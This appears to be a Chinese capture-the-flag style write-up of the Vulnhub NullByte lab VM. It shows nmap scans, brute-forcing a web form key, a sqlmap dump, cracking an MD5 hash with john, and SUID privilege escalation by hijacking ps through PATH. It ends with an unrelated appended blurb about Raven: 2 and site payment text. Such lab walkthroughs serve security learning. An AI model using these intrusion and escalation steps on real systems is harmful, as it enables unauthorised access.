【学渗透靶机——NullByte(suid 提权)】

信息收集

主机信息收集

主机ip地址

nmap -sn  192.168.241.0/24  

在这里插入图片描述

主机开放端口信息

nmap --min-rate 10000 -p- 192.168.241.161

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -p80,111,777,53062 192.168.241.161

在这里插入图片描述

nmap 脚本探测主机漏洞信息

nmap --script=vuln  -p80,111,777,53062 192.168.241.161 

在这里插入图片描述
主机开放了80(http),111,777(ssh),53062(未知) , SSH 目前没有收集到账号及密码信息,爆破ssh 暂时放弃,那重点放在80 端口上,

web信息收集

80端口

80 是http服务,先打开看看
在这里插入图片描述
查看源代码也没有用信息
在这里插入图片描述

下载图片文件分析

(1) 查看文件类型

file main.gif

在这里插入图片描述
(2)查看图片信息是否有捆绑

binwalk main.gif 

在这里插入图片描述
(3)查看图片是否隐写信息

exiftool main.gif

在这里插入图片描述
发现有字符串:kzMb5nVYJw 这个有可能是SSH ROOT密码,也有可能是路径,
尝试登录失败
接下来尝试路径
在这里插入图片描述
果然是路径,, 但是这个需要输入key ,我们目前没有密码
查看源代码
在这里插入图片描述

暴力破解表单

说这个表单不能连接数据库,并且密码不复杂
那我们爆破尝试一下,打开burp 抓包进行爆破,使用rockyou.txt 这个密码字典,爆破出来密码为elite
在这里插入图片描述
输入密码后,输入admin
在这里插入图片描述
在这里插入图片描述

sql注入

从上面的url 判断可能存在sql注入,sqlmap 尝试一下

sqlmap -u "http://192.168.241.161/kzMb5nVYJw/420search.php?usrtosearch=admin"  --dump --batch 

在这里插入图片描述

john 破解MD5 hash

表中的字符串可能是base64 尝试解密

echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE |base64 -d

在这里插入图片描述

c6d6bd7ebf806f43c76acc3681703b81

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

在这里插入图片描述

提权

获取系统初始立足点

密码破解出拉omega。使用密码对应账号ramses尝试SSH登录。登录成功 nmap 端口扫描时SSH的端口是777

在这里插入图片描述

查看当前用户以root权限能够执行命令

在这里插入图片描述
发现没有

查看计划任务

**在这里插入图片描述**

当前用户组可以操作哪些权限


查看文件.bash_history看看能不能发现当前账号执行过什么命令
在这里插入图片描述
这个是什么东西呢,,既然不认识,那就执行这个命令看看

在这里插入图片描述
procwatch 执行时调用了sh 和ps
知道上面的结果那么我们可以劫持ps命令提权了

提权操作

cd /var/www/backup
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch

在这里插入图片描述

也可以生成一个ps文件,然后里面写/bin/sh就可以,给这个文件所有权限然后执行二进制即可提权

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值